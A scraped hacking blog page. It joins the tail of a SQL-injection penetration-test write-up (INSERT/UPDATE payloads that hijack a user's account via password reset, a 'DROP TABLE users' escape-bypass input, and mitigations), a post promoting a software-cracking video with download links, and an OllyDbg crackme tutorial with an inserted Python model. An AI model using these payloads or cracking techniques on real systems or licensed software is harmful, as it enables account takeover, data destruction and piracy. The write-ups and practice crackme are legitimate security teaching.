<br />This, not surprisingly, takes a bit more SQL, and we've wrapped it over several lines for ease of presentation, but our part is still one contiguous string: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x';</span><br /> <span class="snip">INSERT INTO members ('email','passwd','login_id','full_name') </span><br /> <span class="snip">VALUES ('steve@unixwiz.net','hello','steve','Steve Friedl');--</span>';<br /></pre>Even if we have actually gotten our field and table names right, several things could get in our way of a successful attack: <br /><ol><li>We might not have enough room in the web form to enter this much text directly (though this can be worked around via scripting, it's much less convenient). </li><li>The web application user might not have <b>INSERT</b> permission on the <b>members</b> table. </li><li>There are undoubtedly other fields in the <b>members</b> table, and some may <i>require</i> initial values, causing the <b>INSERT</b> to fail. </li><li>Even if we manage to insert a new record, the application itself might not behave well due to the auto-inserted NULL fields that we didn't provide values for. </li><li>A valid "member" might require not only a record in the <b>members</b> table, but associated information in other tables (say, "accessrights"), so adding to one table alone might not be sufficient. </li></ol>In the case at hand, we hit a roadblock on either #4 or #5 - we can't really be sure -- because when going to the main login page and entering in the above username + password, a server error was returned. This suggests that fields we did not populate were vital, but nevertheless not handled properly. 
<br />A possible approach here is attempting to guess the other fields, but this promises to be a long and laborious process: though we may be able to guess other "obvious" fields, it's very hard to imagine the bigger-picture organization of this application. <br />We ended up going down a different road. <br /><h1 id="mail">Mail me a password</h1>We then realized that though we are not able to add a new record to the <b>members</b> database, we can <b>modify</b> an existing one, and this proved to be the approach that gained us entry. <br />From a previous step, we knew that <b>bob@example.com</b> had an account on the system, and we used our SQL injection to update his database record with <b>our</b> email address: <br /><pre class="codeblock">SELECT email, passwd, login_id, full_name<br /> FROM members<br /> WHERE email = '<span class="snip">x';</span><br /> <span class="snip">UPDATE members</span><br /> <span class="snip">SET email = 'steve@unixwiz.net'</span><br /> <span class="snip">WHERE email = 'bob@example.com</span>';<br /></pre>After running this, we of course received the "we didn't know your email address" message, but this was expected due to the dummy email address provided. The <b>UPDATE</b> wouldn't have registered with the application, so it executed quietly. <br />We then used the regular "I lost my password" link - with the updated email address - and a minute later received this email: <br /><pre class="email">From: system@example.com<br />To: steve@unixwiz.net<br />Subject: Intranet login<br /><br />This email is in response to your request for your Intranet log in information.<br />Your User ID is: bob<br />Your password is: hello<br /></pre>It was now just a matter of following the standard login process to access the system as a high-ranked MIS staffer, and this was far superior to a perhaps-limited user that we might have created with our <b>INSERT</b> approach. 
<br />We found the intranet site to be quite comprehensive, and it included - among other things - a list of all the users. It's a fair bet that many Intranet sites also have accounts on the corporate Windows network, and perhaps some of them have used the same password in both places. Since it's clear that we have an easy way to retrieve any Intranet password, and since we had located an open PPTP VPN port on the corporate firewall, it should be straightforward to attempt this kind of access. <br />We had done a spot check on a few accounts without success, and we can't really know whether it's "bad password" or "the Intranet account name differs from the Windows account name". But we think that automated tools could make some of this easier. <br /><h1 id="other">Other Approaches</h1>In this particular engagement, we obtained enough access that we did not feel the need to do much more, but other steps could have been taken. We'll touch on the ones that we can think of now, though we are quite certain that this is not comprehensive. <br />We are also aware that not all approaches work with all databases, and we can touch on some of them here. <br /><dl class="defnlist"><dt> Use xp_cmdshell </dt><dd>Microsoft's SQL Server supports a stored procedure <a href="http://msdn.microsoft.com/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp">xp_cmdshell </a> that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable. </dd><dd>What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to <b>xp_cmdshell</b> is usually limited to administrative accounts, but it's possible to grant it to lesser users. 
</dd><dt> Map out more database structure </dt><dd>Though this particular application provided such a rich post-login environment that it didn't really seem necessary to dig further, in other more limited environments this may not have been sufficient. </dd><dd>Being able to systematically map out the available schema, including tables and their field structure, can't help but provide more avenues for compromise of the application. </dd><dd>One could probably gather more hints about the structure from other aspects of the website (e.g., is there a "leave a comment" page? Are there "support forums"?). Clearly, this is highly dependent on the application and it relies very much on making good guesses. </dd></dl><h1 id="miti">Mitigations</h1>We believe that web application developers often simply do not think about "surprise inputs", but security people do (including the bad guys), so there are three broad approaches that can be applied here. <br /><dl class="defnlist"><dt> Sanitize the input </dt><dd>It's absolutely vital to sanitize user inputs to ensure that they do not contain dangerous codes, whether to the SQL server or to HTML itself. One's first idea is to strip out "bad stuff", such as quotes or semicolons or escapes, but this is a misguided attempt. Though it's easy to point out <b>some</b> dangerous characters, it's harder to point to <b>all</b> of them. </dd><dd>The language of the web is full of special characters and strange markup (including alternate ways of representing the same characters), and efforts to authoritatively identify all "bad stuff" are unlikely to be successful. </dd><dd>Instead, rather than "remove known bad data", it's better to "remove everything but known good data": this distinction is crucial. 
Since - in our example - an email address can contain only these characters: </dd><dd><pre class="codeblock">abcdefghijklmnopqrstuvwxyz<br />ABCDEFGHIJKLMNOPQRSTUVWXYZ<br />0123456789<br />@.-_+<br /></pre></dd><dd>There is really no benefit in allowing characters that could not be valid, and rejecting them early - presumably with an error message - not only helps forestall SQL Injection, but also catches mere typos early rather than storing them in the database. </dd><dd><blockquote><small>Sidebar on email addresses</small><hr />It's important to note here that email addresses <i>in particular</i> are troublesome to validate programmatically, because everybody seems to have his own idea about what makes one "valid", and it's a shame to exclude a good email address because it contains a character you didn't think about. The only real authority is <a href="http://rfc.net/rfc2822.html">RFC 2822</a> (which encompasses the more familiar RFC822), and it includes a fairly expansive definition of what's allowed. The truly pedantic may well wish to accept email addresses with ampersands and asterisks (among other things) as valid, but others - including this author - are satisfied with a reasonable subset that includes "most" email addresses. Those taking a more restrictive approach ought to be fully aware of the consequences of excluding these addresses, especially considering that better techniques (prepare/execute, stored procedures) obviate the security concerns which those "odd" characters present. <hr /></blockquote></dd><dd>Be aware that "sanitizing the input" doesn't mean merely "remove the quotes", because even "regular" characters can be troublesome. In an example where an integer ID value is being compared against the user input (say, a numeric PIN): </dd><dd><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM <i>table</i><br /> WHERE id = <span class="snip">23 OR 1=1</span>; -- Boom! 
Always matches!<br /></pre></dd><dd>In practice, however, this approach is highly limited because there are so few fields for which it's possible to outright exclude many of the dangerous characters. For "dates" or "email addresses" or "integers" it may have merit, but for any kind of real application, one simply cannot avoid the other mitigations. </dd><dt> Escape/Quotesafe the input </dt><dd>Even if one might be able to sanitize a phone number or email address, one cannot take this approach with a "name" field lest one wishes to exclude the likes of Bill <b>O'Reilly</b> from one's application: a quote is simply a valid character for this field. </dd><dd>One includes an actual single quote in an SQL string by putting two of them together, so this suggests the obvious - but wrong! - technique of preprocessing every string to replicate the single quotes: </dd><dd><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM customers<br /> WHERE name = '<span class="snip">Bill O''Reilly</span>'; -- works OK<br /></pre></dd><dd>However, this naïve approach can be beaten because most databases support other string escape mechanisms. MySQL, for instance, also permits <b>\'</b> to escape a quote, so after input of <span class="snip">\'; DROP TABLE users; --</span> is "protected" by doubling the quotes, we get: </dd><dd><pre class="codeblock">SELECT <i>fieldlist</i><br /> FROM customers<br /> WHERE name = '<span class="snip">\''; DROP TABLE users; --</span>'; -- Boom!<br /></pre></dd><dd>The expression <span class="snip">'\''</span> is a complete string (containing just one single quote), and the usual SQL shenanigans follow. It doesn't stop with backslashes either: there is Unicode, other encodings, and parsing oddities all hiding in the weeds to trip up the application designer. </dd><dd>Getting quotes right is <b>notoriously</b> difficult, which is why many database interface languages provide a function that does it for you. 
When the same internal code is used for "string quoting" and "string parsing", it's much more likely that the process will be done properly and safely. </dd><dd>Some examples are the MySQL function <b>mysql_real_escape_string()</b> and perl DBD method <b>$dbh->quote($value)</b>. </dd><dd><b><i>These methods must be used</i></b>. </dd><dt> Use bound parameters (the <b>PREPARE</b> statement) </dt><dd>Though quotesafing is a good mechanism, we're still in the area of "considering user input as SQL", and a much better approach exists: <b>bound parameters</b>, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled ("prepared", in SQL parlance) into an internal form. </dd><dd>Later, this prepared query is "executed" with a list of parameters: </dd><dd><div class="blocklabel">Example in perl</div><pre class="codeblock">$sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = <span class="snip">?</span>;");<br /><br />$sth->execute(<span class="snip">$email</span>);<br /></pre></dd><dd>Thanks to Stefan Wagner, this demonstrates bound parameters in Java: </dd><dd><div class="blocklabel">Insecure version</div><pre class="codeblock">Statement s = connection.createStatement();<br />ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = "<br /> + <span class="snip">formField</span>); // *boom*<br /></pre></dd><dd><div class="blocklabel">Secure version</div><pre class="codeblock">PreparedStatement ps = connection.prepareStatement(<br /> "SELECT email FROM member WHERE name = <span class="snip">?</span>");<br />ps.setString(1, <span class="snip">formField</span>);<br />ResultSet rs = ps.executeQuery();<br /></pre></dd><dd>Here, <b>$email</b> is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark), and at no point do the contents of this variable have 
anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application will be largely immune to SQL injection attacks. </dd><dd>There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed <i>once</i>), but this is minor compared to the <b>enormous</b> security benefits. This is probably the single most important step one can take to secure a web application. </dd><dt> Limit database permissions and segregate users </dt><dd>In the case at hand, we observed just two interactions that are made not in the context of a logged-in user: "log in" and "send me password". The web application ought to use a database connection with the most limited rights possible: query-only access to the <b>members</b> table, and no access to any other table. </dd><dd>The effect here is that even a "successful" SQL injection attack is going to have much more limited success. Here, we'd not have been able to do the <b>UPDATE</b> request that ultimately granted us access, so we'd have had to resort to other avenues. </dd><dd>Once the web application determined that a set of valid credentials had been passed via the login form, it would then switch that session to a database connection with more rights. </dd><dd>It should go almost without saying that <b>sa</b> rights should <i>never</i> be used for any web-based application. </dd><dt> Use stored procedures for database access </dt><dd>When the database server supports them, use stored procedures for performing access on the application's behalf, which can eliminate SQL entirely (assuming the stored procedures themselves are written properly). </dd><dd>By encapsulating the rules for a certain action - query, update, delete, etc. 
- into a single procedure, it can be tested and documented on a standalone basis and business rules enforced (for instance, the "add new order" procedure might reject that order if the customer were over his credit limit). </dd><dd>For simple queries this might be only a minor benefit, but as the operations become more complicated (or are used in more than one place), having a single definition for the operation means it's going to be more robust and easier to maintain. </dd><dd><b>Note</b>: it's always possible to write a stored procedure that itself constructs a query dynamically: this provides <b>no</b> protection against SQL Injection - it's only proper binding with prepare/execute or direct SQL statements with bound variables that provide this protection. </dd><dt> Isolate the webserver </dt><dd>Even having taken all these mitigation steps, it's nevertheless still possible to miss something and leave the server open to compromise. One ought to design the network infrastructure to <b>assume</b> that the bad guy will have full administrator access to the machine, and then attempt to limit how that can be leveraged to compromise other things. </dd><dd>For instance, putting the machine in a DMZ with extremely limited pinholes "inside" the network means that even getting complete control of the webserver doesn't automatically grant full access to everything else. This won't stop everything, of course, but it makes it a lot harder. </dd><dt> Configure error reporting </dt><dd>The default error reporting for some frameworks includes developer debugging information, and this <b>cannot</b> be shown to outside users. Imagine how much easier a time it makes for an attacker if the full query is shown, pointing to the syntax error involved. </dd><dd>This information <i>is</i> useful to developers, but it should be restricted - if possible - to just internal users. 
</dd></dl>Note that not all databases are configured the same way, and not all even support the same dialect of SQL (the "S" stands for "Structured", not "Standard"). For instance, most versions of MySQL do not support subselects, nor do they usually allow multiple statements: these are substantially complicating factors when attempting to penetrate a network. <br /><hr /></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-88724598271020738262011-02-16T07:35:00.000-08:002011-06-27T20:13:52.751-07:00Ollydbg Basics With Video<div dir="ltr" style="text-align: left;" trbidi="on"><h2 class="title icon">Basic Tutorial Video on How to use Ollydbg and Peid to Crack </h2><div class="content"><div id="post_message_1061"><blockquote class="postcontent restore ">Software Cracking is the art of breaking security protections in a software. Generally software cracks are distributed in the form of patches to the original software or keygen programs which generate arbitrary key / serial combinations. A Cracker works his way through a program by disassembling it and understanding the security protections built into it. He then proceeds to alter the behavior of the program by finding and changing (patching) the routines responsible for the security mechanisms, in order to allow full unlimited access to the program. Alternately, he can also reverse engineer the key / serial comparison routines and write a keygen for the program. This allows users to generate arbitrary valid keys / serials for the program.<br /><br />In this awesome video created by Spiffomatic64, we learn about the basics of software cracking. Spiffomatic64 starts with a basic introduction to the tools of the trade - Ollydbg and Peid. 
<br /><br />He talks about Ollydbg in detail:<br /><br /><ul><li>the screen organization, shortcuts</li><li>how to run / pause programs</li><li>setting / removing breakpoints</li><li>how to inspect memory / code in a running program</li></ul><br />He then uses a simple crackme <b>prolixe_keygenme1.zip</b> to show how software crackers work their way through a binary. He first verifies using Peid that the program has not been compressed or packed and then loads this program into Ollydbg, disassembles it and then proceeds to find the place in the code responsible for the annoying alert message shown in the beginning and then finally the place responsible for the key validation checks. <br /><br />Once the code in these routines has been understood, he proceeds to patch the binary to convert the crackme into a keygen. Very nicely done. This video is a highly recommended watch for budding reverse engineers!<br /><br />I would recommend that users download the video pack and the crackme all neatly provided in the link below and try the entire process themselves. 
Thanks go out to Spiffomatic64 for this video.<br /><br /><b>Here is a screenshot of the cracking video in .mp4 <a href="http://www.multiupload.com/SGPL3NTTU4" target="_blank">f</a>ormat:</b><blockquote><a href="http://hotfile.com/dl/48005850/f97c6fa/Ollydebug_and_Peid_cracking_tutorial_video.rar.html" target="_blank"><img alt="" border="0" height="320" src="http://i46.tinypic.com/142v2gx.jpg" style="max-width: 640px;" width="320" /></a><br /></blockquote></blockquote>If the above image is not shown, just check the video (download it from the link given below). <br /><blockquote class="postcontent restore "><a href="http://hotfile.com/dl/48005850/f97c6fa/Ollydebug_and_Peid_cracking_tutorial_video.rar.html" target="_blank">http://hotfile.com/dl/48005850/f97c6fa/Ollydebug_and_Peid_cracking_tutorial_video.rar.html</a></blockquote><br />writer - hackeramit4u@gmail.com </div></div></div>Posted by Hacking Skills<br /><br />Ollydbg Basics for Beginners (published 2011-02-15T08:09:00.000-08:00, updated 2011-06-27T20:13:52.751-07:00)<br /><div dir="ltr" style="text-align: left;" trbidi="on">I've decided to write this series of articles almost as a helper to those stuck on Geek 8. Looking at the stats, this seems to be where a lot of users get stuck so hopefully this article will show you how to progress. When I came to this level, I hadn't done anything like this before but since then I've been doing some reading around the subject and (geekily enough) I find it quite interesting. <br /><br />--------------------- <br />Section 1 - The Tools <br />--------------------- <br />1. Ollydbg<br /><br />--------------------------- <br />Section 2 - Getting Started <br />--------------------------- <br /><br />Ok, so you should have downloaded the crackme and have Ollydbg installed. The first thing to do is close this tutorial and have a play around. 
See what you can find and get a feel for the program. The very least this will do is teach you how to use basic Ollydbg functions. No cheating now ;-) <br /><br />Done? Well, maybe you surprised yourself and found things you thought you'd never find? Maybe you found nothing and reckon you just wasted 30 minutes? Either way, I'll go through the process I used to reverse this and hopefully it will teach you a few things. <br /><br />Okay, so run the crackme and let's have a look around. Well, there's not much to see but we can find a 'Register' box. Enter a username into the box and a random serial. You'll get a message saying 'No luck there mate' (incidentally, if you do happen to guess your serial and get the 'Congratulations' message, I recommend that you buy a lottery ticket today). So we know what we need to do; we need to find the serial - at this point we don't know if it's a hard-coded number or if it's generated from the username but that's part of the fun! <br /><br />Okay, so open Olly and select Crackme1.exe. You'll then be presented with the workings of the application, starting about here : <br /><br />00401000 6A 00 PUSH 0 <br />00401002 E8 FF040000 CALL <JMP.&KERNEL32.GetModuleHandleA> <br />00401007 A3 CA204000 MOV DWORD PTR DS:[4020CA],EAX <br />0040100C 6A 00 PUSH 0 <br /><br />Now, we know that the Crackme is taking whatever we typed and checking it against the correct serial. We therefore need Olly to intercept any calls this crackme makes where it could be reading what we typed from the username and serial boxes. There are a few ways Windows does this - it's beyond the scope of this article to teach you the depths - but I will tell you that one of them is using the call 'GetDlgItemTextA'. <br /><br />So, what we need to do is make sure that if the Crackme makes this call, Olly intercepts it and breaks for us so that we can follow what is being done with the information. That's easy enough. 
If you press Ctrl-N (or right click and select 'Search for' followed by 'name (label) in current module') you are presented with a list of calls made by the crackme. You can then right click on GetDlgItemTextA and select 'set breakpoint on every reference'. <br /><br />We're ready to go. Press F9 and Olly will run the crackme, presenting you with its user interface. Go to the registration box and enter a name and any serial. I'm using "FaTaLPrIdE" and "123456". Press the register button and Olly should break here : <br /><br />004012C4 |. E8 07020000 |CALL <JMP.&USER32.GetDlgItemTextA> <br />004012C9 |. 83F8 01 |CMP EAX,1 <br />004012CC |. C745 10 EB0300> |MOV DWORD PTR SS:[EBP+10],3EB <br /><br />Now, this is the first reference to the call 'GetDlgItemTextA' so we know our serial is shortly going to be read in. If you read the top of your Olly window, it should say [CPU - main thread, module Crackme1]. This is important because when this says Kernel or User32, we know we can keep stepping as it has nothing to do with our serial - we are only interested in the Crackme. <br /><br />Press F8 to step over the program and try to get a feel for what is going on. Pressing just twice will bring you into User32 and after 15 step overs we are back with the crackme. 25 steps take us back to User32 and 38 take us back again. In future you will use F10 and F12 to step; F8 just shows you more of what's involved. If we continue this process we go through a long session in User32 and eventually land back here: <br /><br />00401223 . 83F8 00 CMP EAX,0 <br />00401226 .^74 BE JE SHORT Crackme1.004011E6 <br />00401228 . 68 8E214000 PUSH Crackme1.0040218E ; ASCII "FaTaL_PrId" <br />0040122D . E8 4C010000 CALL Crackme1.0040137E <br />00401232 . 50 PUSH EAX <br />00401233 . 68 7E214000 PUSH Crackme1.0040217E ; ASCII "123456" <br />00401238 . E8 9B010000 CALL Crackme1.004013D8 <br />0040123D . 83C4 04 ADD ESP,4 <br />00401240 . 58 POP EAX <br />00401241 . 3BC3 CMP EAX,EBX <br />00401243 . 
74 07 JE SHORT Crackme1.0040124C <br /><br />This is where the fun begins. We're done with the User32 code and are back with the main routine of the Crackme. Olly even helps show us we're in the right place by showing that our entered username and password are pushed to the stack before calls are made and a compare is made shortly afterwards. <br /><br />For now, press Ctrl-N, select 'GetDlgItemTextA' and press 'remove all breakpoints'. Then select the line 00401223 and press F2 to put a new breakpoint here. What this means is that you can now come back here whenever you run the program without stepping through all the previous steps we have taken. You don't want to search for this again if you press a wrong button somewhere! <br /><br />So, we probably know how we could get the congrats message - a flick of the Z bit at 00401241 or a simple patch of the JE at 00401243 should do it. But that doesn't teach us much; we want to know exactly what this crackme is doing in order to test our username and serial. Our job is to trace the calls at 0040122D and 00401238 to find out exactly what is going on here. <br /><br /><br />----------------------------- <br />Section 3 - The First Routine <br />----------------------------- <br /><br />You should still be at 00401243. Press F8 until you highlight the following row: <br />0040122D . E8 4C010000 CALL Crackme1.0040137E <br /><br />Now press F7. The difference between F7 and F8 is that F8 steps over calls and F7 steps into them. In other words, if a call is of no interest to you, you can press F8 to step over it and carry on. If you think that it might contain some vital information, press F7 to step into it and you can look at it in detail. <br /><br />You should now be here : <br /><br />0040137E /$ 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4] ; Crackme1.0040218E <br />00401382 |. 56 PUSH ESI <br />00401383 |> 8A06 /MOV AL,BYTE PTR DS:[ESI] <br />00401385 |. 84C0 |TEST AL,AL <br />00401387 |. 
74 13 |JE SHORT Crackme1.0040139C <br />00401389 |. 3C 41 |CMP AL,41 <br />0040138B |. 72 1F |JB SHORT Crackme1.004013AC <br />0040138D |. 3C 5A |CMP AL,5A <br />0040138F |. 73 03 |JNB SHORT Crackme1.00401394 <br />00401391 |. 46 |INC ESI <br />00401392 |.^EB EF |JMP SHORT Crackme1.00401383 <br />00401394 |> E8 39000000 |CALL Crackme1.004013D2 <br />00401399 |. 46 |INC ESI <br />0040139A |.^EB E7 \JMP SHORT Crackme1.00401383 <br />0040139C |> 5E POP ESI <br />0040139D |. E8 20000000 CALL Crackme1.004013C2 <br /><br />Okay, so we see at 0040137E that our username is loaded into ESI ready for processing. The first character of our username (F in my case) is then moved into AL before being tested to see if it is 0. Then the interesting stuff starts - at 00401389 the F is compared with 41. A strange comparison you might think? <br /><br />Open up a browser window and go to <a href="http://www.asciitable.com/">www.asciitable.com</a> and you'll get a better understanding. The computer deals with character values in hex, i.e. next to my F in Olly is the number 46. If you look at the ASCII table you will see that 46 is the hexadecimal representation of 'F' and 41 is the representation of 'A'. What the line at 00401389 is doing, then, is taking the first letter of our username and comparing it with A. The result of this comparison affects what happens at the jump on the next line (0040138B): if the first letter of our name is less than A (see the ASCII table), it jumps elsewhere. My F is above A though, so we continue to 0040138D. <br /><br />Here a similar operation is performed. A quick look at our ASCII values shows us that our character is now being compared with Z - this time a jump is taken if the value is above Z. Obviously, my F is fine and we continue. <br /><br />At 00401399 ESI is incremented before a jump is taken back to 00401383. 
If you remember, our username is stored in ESI so this has essentially just moved us to the next letter of our username and gone back to the beginning of this routine. My second letter is 'a' so let's see how this is dealt with. <br /><br />Well, stepping through, it passes the comparison with 'A' as 61 is indeed greater than 41(A). When we get to the comparison with Z though, it fails and the jump is taken at 0040138F to 00401394. This is because, as the table shows, a(61) is greater than Z(5A). <br /><br />So we land here : <br />00401394 |> E8 39000000 |CALL Crackme1.004013D2 <br /><br />Which in turn sends us here: <br />004013D2 /$ 2C 20 SUB AL,20 <br />004013D4 |. 8806 MOV BYTE PTR DS:[ESI],AL <br />004013D6 \. C3 RETN <br /><br />So what's happening here? Our character is in AL and gets 20 subtracted from it. What's this for? Check out the ASCII table.... you will see that my 'a' is 20 values higher than 'A' i.e. a-20=A; this subroutine has just capitalised my character! It then jumps back to the routine, increments ESI to the next letter and continues. <br /><br />Step through the rest of the routine and you'll notice that your entire username is processed to make sure it's uppercase. That's all this bit is doing. My username is now FATALPRIDE. <br /><br />A couple of points to note though are that if you only used uppercase letters anyway, this routine is redundant and you won't even see the SUB AL,20 part. Also, if you have non-alphabetic characters in there, they'll be taken down 20 values too as they obviously are not between A and Z. <br /><br />Once the last letter of your username has been processed, the TEST AL,AL will fail and the application jumps out of this loop to 0040139C where your newly capitalised name is popped from the stack to ESI. <br /><br />Then comes this line: <br />0040139D |. E8 20000000 CALL Crackme1.004013C2 <br /><br />Press F7 to trace this call - this is the second routine. Setting a breakpoint here may be useful too! 
<br /><br /><br />------------------------------ <br />Section 4 - The Second Routine <br />------------------------------ <br /><br />When we trace the above call we get the following: <br />004013C2 /$ 33FF XOR EDI,EDI <br />004013C4 |. 33DB XOR EBX,EBX <br />004013C6 |> 8A1E /MOV BL,BYTE PTR DS:[ESI] <br />004013C8 |. 84DB |TEST BL,BL <br />004013CA |. 74 05 |JE SHORT Crackme1.004013D1 <br />004013CC |. 03FB |ADD EDI,EBX <br />004013CE |. 46 |INC ESI <br />004013CF |.^EB F5 \JMP SHORT Crackme1.004013C6 <br />004013D1 \> C3 RETN <br /><br />So what's happening here? Well, firstly EDI and EBX are XOR'd with themselves - you've passed enough challenges to know that this always returns a 0 result, hence this is just a way of clearing both EDI and EBX. <br /><br />Then a similar thing happens to what happened in the above routine - the only difference being that the first letter of our capitalised username is moved to BL rather than AL. It's then tested in case it's 0 before landing at 004013CC. <br /><br />If you've read Trope's articles, you'll know that BL (where our character is stored) is just the lowest byte of EBX. Hence ADD EDI,EBX is taking the value of that character and adding it to EDI - obviously, we just zeroed EDI so for the first letter, it's added to 0. We then increment to the next letter of our username and the process is repeated, although notice that the loop does not include the XOR functions each time. This basically has the effect of adding all the values of our username together and storing the total in EDI. For my username I get this : <br /><br />F + A + T + A + L + P + R + I + D + E <br />46 + 41 + 54 + 41 + 4C + 50 + 52 + 49 + 44 + 45 = 02DC <br /><br />At the end of the username, we fail the TEST BL,BL and jump out to the return statement at 004013D1. Our summed username (02DC in my case) is still stored in EDI. 
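<br /><br />A useful habit when tracing is to rewrite each routine in a high-level language and check it against what the debugger showed. The Python model below is an added example, not part of the original article: it follows the listings at 0040137E and 004013C2 instruction by instruction. Read literally, JNB at 0040138F also fires for 'Z' itself, and bytes below 'A' take the JB at 0040138B; the code at 004013AC is not shown in the article, so that path is modelled here as a rejection (an assumption).

```python
"""Model of the two username routines traced in Sections 3 and 4."""


def normalise_username(raw: bytes):
    """Emulate the loop at 00401383..0040139A on a copy of the buffer.

    Returns the rewritten buffer, or None when a byte takes the JB at
    0040138B (target 004013AC is not listed in the article; treating it
    as a rejection is an assumption of this model).
    """
    buf = bytearray(raw)
    for i in range(len(buf)):
        al = buf[i]                      # MOV AL,BYTE PTR DS:[ESI]
        if al == 0:                      # TEST AL,AL / JE -> end of string
            return bytes(buf[:i])
        if al < 0x41:                    # CMP AL,41 / JB (unsigned below 'A')
            return None
        if al >= 0x5A:                   # CMP AL,5A / JNB (not below 'Z')
            buf[i] = (al - 0x20) & 0xFF  # SUB AL,20 ; MOV [ESI],AL
    return bytes(buf)


def sum_username(buf: bytes) -> int:
    """Emulate 004013C2..004013D1: 32-bit sum of the bytes, left in EDI."""
    edi = 0                              # XOR EDI,EDI
    for bl in buf:                       # MOV BL,[ESI] (EBX was zeroed)
        if bl == 0:                      # TEST BL,BL / JE -> RETN
            break
        edi = (edi + bl) & 0xFFFFFFFF    # ADD EDI,EBX
    return edi


def trace(raw: bytes):
    """Run both routines; returns (normalised name, sum) or (None, None)."""
    name = normalise_username(raw)
    if name is None:
        return None, None
    return name, sum_username(name)


if __name__ == "__main__":
    # Constructed inputs: the article's username plus a few edge cases.
    for sample in (b"FaTaLPrIdE", b"Zed", b"a_b", b"R2D2", b"ab", b"ba"):
        name, total = trace(sample)
        shown = "rejected" if name is None else f"{name!r} sum={total:04X}"
        print(f"{sample!r:14} -> {shown}")
```

The model reproduces the article's 02DC for FaTaLPrIdE. It also shows two properties of the check that are easy to miss in the debugger: 'Z' is rewritten to ':' because the comparison is "not below", and the sum ignores character order, so different usernames can produce the same value.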
<br /><br /><br />--------------------------------------- <br />Section 5 - Finishing With The Username <br />--------------------------------------- <br /><br />So the last line of the above routine is : <br />004013D1 \> C3 RETN <br /><br />When we step over this, it takes us back to the end of the first routine, to where the second routine was called from. We land here : <br />004013A2 |. 81F7 78560000 XOR EDI,5678 <br />004013A8 |. 8BC7 MOV EAX,EDI <br /><br />Okay, so here we have another XOR statement - this time the contents of EDI are XOR'd with '5678'. We know that EDI contains our summed username so in my case, this equation is : <br /><br />02DC XOR 5678 - the result is stored in EDI again (54A4 in my case) before the next statement moves it to EAX. We then jump back to the initial code we looked at in section 2. <br /><br />00401223 . 83F8 00 CMP EAX,0 <br />00401226 .^74 BE JE SHORT Crackme1.004011E6 <br />00401228 . 68 8E214000 PUSH Crackme1.0040218E ; ASCII "FaTaL_PrId" <br />0040122D . E8 4C010000 CALL Crackme1.0040137E <br />00401232 . 50 PUSH EAX <br />00401233 . 68 7E214000 PUSH Crackme1.0040217E ; ASCII "123456" <br />00401238 . E8 9B010000 CALL Crackme1.004013D8 <br />0040123D . 83C4 04 ADD ESP,4 <br />00401240 . 58 POP EAX <br />00401241 . 3BC3 CMP EAX,EBX <br />00401243 . 74 07 JE SHORT Crackme1.0040124C <br /><br />The difference is that we have now completed the call at 0040122D and we're now at 00401232 waiting to continue. Congratulations, you've just traced your first call and now you understand exactly how this application processes a username! Now see if you can follow the same procedure for the second call below! Trace into it with F7 and see what you can find...... set a breakpoint first so that if you mess up you can try again or pick this guide up where you left off! <br /><br />------------------------------------ <br />Section 6 - Starting With The Serial <br />------------------------------------ <br /><br />How did you get on? 
Let's find out.... <br /><br />Firstly we see EAX is pushed to the stack (we know that this contains our summed username XOR'd with 5678 from the previous call) and then our entered serial (123456) is pushed to the stack too. We can then use F7 to trace our second call. We land here : <br /><br />004013D8 /$ 33C0 XOR EAX,EAX <br />004013DA |. 33FF XOR EDI,EDI <br />004013DC |. 33DB XOR EBX,EBX <br />004013DE |. 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4] <br />004013E2 |> B0 0A /MOV AL,0A <br />004013E4 |. 8A1E |MOV BL,BYTE PTR DS:[ESI] <br />004013E6 |. 84DB |TEST BL,BL <br />004013E8 |. 74 0B |JE SHORT Crackme1.004013F5 <br />004013EA |. 80EB 30 |SUB BL,30 <br />004013ED |. 0FAFF8 |IMUL EDI,EAX <br />004013F0 |. 03FB |ADD EDI,EBX <br />004013F2 |. 46 |INC ESI <br />004013F3 |.^EB ED \JMP SHORT Crackme1.004013E2 <br />004013F5 |> 81F7 34120000 XOR EDI,1234 <br />004013FB |. 8BDF MOV EBX,EDI <br />004013FD \. C3 RETN <br /><br />The first three lines should be no issue - we're clearing the EAX, EDI and EBX registers by XORing them with themselves. Following this, our serial number is moved into ESI and the processing begins. <br /><br /><br />--------------------------------- <br />Section 7 - Processing The Serial <br />--------------------------------- <br /><br />So you should be at the beginning of the loop at 004013E2. Let's try and work out what's going on here. Firstly, 0A (10) is moved into AL and then the first character of our serial (1 in my case) is moved into BL before being tested for 0 in the usual way. Note though that EBX contains 31 rather than 1 i.e. the hexadecimal representation of the character 1. <br /><br />After this, 30 is subtracted from our number i.e. 31-30 in my case. Then EAX and EDI are multiplied and our processed character added to the result. This is then stored in EDI. <br /><br />In other words, EDI holds (31-30) + (10x0) = 1 ; after one iteration on my serial. 
